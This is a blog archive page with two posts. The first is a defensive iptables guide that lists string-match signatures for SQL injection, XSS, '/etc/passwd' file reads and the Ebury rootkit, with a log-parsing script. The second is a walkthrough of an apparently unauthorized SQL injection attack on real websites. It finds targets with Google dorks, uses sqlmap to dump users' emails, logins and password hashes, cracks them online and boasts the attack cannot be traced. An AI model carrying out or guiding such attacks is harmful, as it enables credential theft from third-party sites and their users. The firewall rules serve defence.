Tag Archive: sql injection


iptables is more than an ordinary firewall, provided it is used properly.

There are cases where security analysts have no option to work with a hardware firewall, or sometimes no access to the DC at all, mainly on cPanel servers.

In that case the only option is a customized solution; one of its kind is shown below.

[screenshot: iptables]

With iptables string matching you can achieve the highest security possible, with log scanning to catch anything that bypasses the firewall.

This is essentially an IPS/IDS that depends on signature matching.

  1. Create a chain, say “w00t”.
  2. After all the INPUT rules, jump to the w00t chain for additional checks.
  3. In that chain, specify malicious signatures to detect different types of attacks.
  4. If a packet matches, first log it and then drop it.

Your iptables file should look something like this:

# iptables-restore format: the table header and the closing COMMIT are required
*filter
:INPUT ACCEPT [2404:336622]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [2359:257349]
:LOGGING - [0:0]
:w00t - [0:0]

-A INPUT -i lo -j ACCEPT
-A INPUT -s 127.0.0.1 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp --dport 22 -j ACCEPT

# hand every remaining TCP packet to the signature chain
-A INPUT -p tcp -j w00t

# outbound DNS carrying the Ebury signature: log, then drop
-A OUTPUT -p tcp -m tcp --dport 53 -m string --hex-string "|120b01000001|" --algo bm --to 65535 -j LOG --log-prefix "Ebury SSH Rootkit:" --log-level 7
-A OUTPUT -p tcp -m tcp --dport 53 -m string --hex-string "|120b01000001|" --algo bm --to 65535 -j DROP

# w00tw00t scanner signature: log, then drop
-A w00t -p tcp -m string --string "w00tw00t.at.ISC.SANS" --algo bm --to 65535 -j LOG --log-prefix "w00tw00t detected:" --log-level 7
-A w00t -p tcp -m string --string "w00tw00t.at.ISC.SANS" --algo bm --to 65535 -j DROP
COMMIT

The above will first log matching packets (in chain w00t) and then drop them.

Log:

Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=x.x.x.x DST=96.31.85.162 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
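As an added example (not part of the original post), here is a small Python parser for the kernel log lines that the LOG rules above produce, so the hits can be counted per log prefix, source and destination port. The sample lines are constructed: the first mirrors the entry shown in the post with its x.x.x.x replaced by documentation addresses, and the last is a non-firewall line to show it is skipped.

```python
import re
from collections import Counter

# Constructed sample of /var/log/firewall.log (kern.* facility); addresses are documentation ranges
SAMPLE_LOG = """\
Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=10.0.0.5 DST=192.0.2.10 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
Apr 14 20:19:31 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=10.0.0.5 DST=192.0.2.10 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10416 DF PROTO=TCP SPT=59421 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
Apr 14 20:20:02 darkwizz kernel: Ebury SSH Rootkit:IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=41230 DPT=53 WINDOW=14600 RES=0x00 SYN URGP=0
Apr 14 20:20:05 darkwizz sshd[1234]: Accepted publickey for root from 10.0.0.9 port 50000 ssh2
"""

# "<timestamp> <host> kernel: <--log-prefix>IN=... OUT=... SRC=... ..." (the prefix ends at the colon before IN=)
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s(?P<host>\S+)\skernel:\s(?P<prefix>.*?):(?P<fields>IN=.*)$"
)


def parse_line(line):
    """Return a dict of the LOG entry's fields, or None for lines not written by iptables."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ts": m.group("ts"), "host": m.group("host"), "prefix": m.group("prefix").strip()}
    for tok in m.group("fields").split():
        if "=" in tok:            # KEY=VALUE pairs (OUT= is legitimately empty on INPUT hits)
            key, val = tok.split("=", 1)
            rec[key] = val
        else:                     # bare tokens are IP/TCP flags: DF, SYN, ACK, PSH, FIN
            rec.setdefault("flags", []).append(tok)
    return rec


def summarise(text):
    """Count hits per (log prefix, source address, destination port)."""
    counts = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            counts[(rec["prefix"], rec.get("SRC", "-"), rec.get("DPT", "-"))] += 1
    return counts


def repeat_offenders(counts, threshold=2):
    """Source addresses that tripped any one signature at least `threshold` times."""
    return sorted({src for (_, src, _), n in counts.items() if n >= threshold})


if __name__ == "__main__":
    hits = summarise(SAMPLE_LOG)
    for (prefix, src, dpt), n in hits.most_common():
        print(f"{n:3d}  {prefix:<20} {src:<15} dpt={dpt}")
    print("repeat offenders:", repeat_offenders(hits))
```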

Test Scenarios:

1. Open a command line and type:

nc -l 5501

2. Open another session to that server:

telnet server-ip 5501

From the telnet command line, type:

test

3. In the first session, where you typed the nc command, you’ll see “test” appear.

4. From the second terminal (step 2), type “w00tw00t”.

5. The string won’t appear in the first session, and the subsequent packets of that connection will be dropped by the server.

6. Check the logs and you will see the entry.

Where is the iptables log written? Check the syslog configuration:

cat /etc/syslog.conf

kern.*                        /var/log/firewall.log

Back to our firewall rules:

outbound traffic from the server is dropped if it matches the hex string “120b01000001”, which is a signature of the Ebury trojan.

You can easily convert any Snort rule into an iptables rule.

Some rules according to the type of attack:

1. SQL Injection Attacks:

The string “%27or%271%27%3D%271” is URL-encoded; decoded, it reads ‘ or ‘1’=’1.

-m string --string "%27+or+%271%27%3d%271"

-m string --string "%27+or+1%3d1"

-m string --string "%27+or+%271%27%3d%271"

-m string --string "%27)+or+%27%27%3d%27"

-m string --string "%27)+or+1%3d1"

-m string --string "%27)+or+%271%27%3d%271"

-m string --string "%27)+or+(%27%27%3d%27"

-m string --string "%27)+or+(1%3d1"

-m string --string "%27)+or+(%271%27%3d%271"

2. Buffer Overflow Exploits

-m string --string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Recently I posted http://ustechnica.com/category/security/wordpress-arbitrary-file-download-and-file-deletion-exploit/

and was able to download the /etc/passwd file; you can match this string as well and drop the request.

3. Arbitrary File Download

-m string --string "/etc/passwd"

4. Cross Site Scripting

-m string --string "%3C%73%63%72%69%70%74%3E"

-m string --string "<script>"

You just need to convert all Snort rules to iptables; below are good references that can be used.

Ref:

ftp://ftp.itb.ac.id/pub/ISO-IMAGES/linux/filenya-putu-shinoda/bukulinux/LinuxFirewall-Attack%20Detection.pdf

http://www.bandwidthco.com/sf_whitepapers/firewalls/IPTables%20Linux%20Firewall%20with%20Packet%20String-matching%20support.pdf

MySQL Injection attack

I was curious about MySQL injection (a common vulnerability found in many websites), so I started learning about it and tried to exploit a couple of test websites.

After a couple of test runs, I exploited it in a manner that can’t be traced back.

I won’t go into more detail but will jump directly to exploiting one of the websites.

For detailed theory and explanation, see: http://securityoverride.org/articles.php?article_id=1

Step 1. Google dork for MySQL injection:

inurl=category.php?id= site:com.au (This will list all the websites having category.php?id= in url for Australian sites.)

[screenshot: dork]

You can refer to these good links of Google dorks for different kinds of attacks:

http://www.exploit-db.com/google-dorks/

Joomla: http://www.hackerbradri.com/2012/07/google-dorks-for-jamoola.html

SQLi – RFI – LFI – Joomla http://pastebin.com/92rkBSps

WordPress: http://newexploits.com/wordpress/tag/google-dork/

Step 2: Information gathering, scanning

Since you have decided upon your target, we need to gather information about it.

Information gathering is the most important baseline on which your entire POA (plan of action) depends.

Here I am using OWASP ZAP 2.0.0; installation is pretty straightforward. BackTrack/Kali comes with ZAP installed by default.

In Windows, keep clicking and the installation is done. 😛 :).

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

[screenshot: owasp1]

[screenshot: owasp2]

After the scan, we got 2 vulnerabilities:

  • Cross Site Scripting
  • SQL Injection (Union Based)

Step 3: Exploit the loopholes.

I’ve used SQLMap here.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

http://sqlmap.org/

This will fetch all the DBs and will also check whether the URL is vulnerable to SQL injection.

Once done, say you have the DB, as example_db. Let’s exploit further to fetch the tables.

[screenshot: inject1]

[screenshot: inject2]

  • Select the table and fetch the information pertaining to it.

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users --columns

We will get the names of the columns in that table, with their data types.

  • Exploiting further:

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users -C ID,user_email,user_login,user_pass --dump

[screenshot: inject3]

[screenshot: inject4]

It’s done. Hacked, with password.

[screenshot: inject5]

From the above snag, we couldn’t crack the first entry.

Let’s try it online. 🙂

http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php

[screenshot: inject6]

Cheers!!!!!!!!!!!!!!! 🙂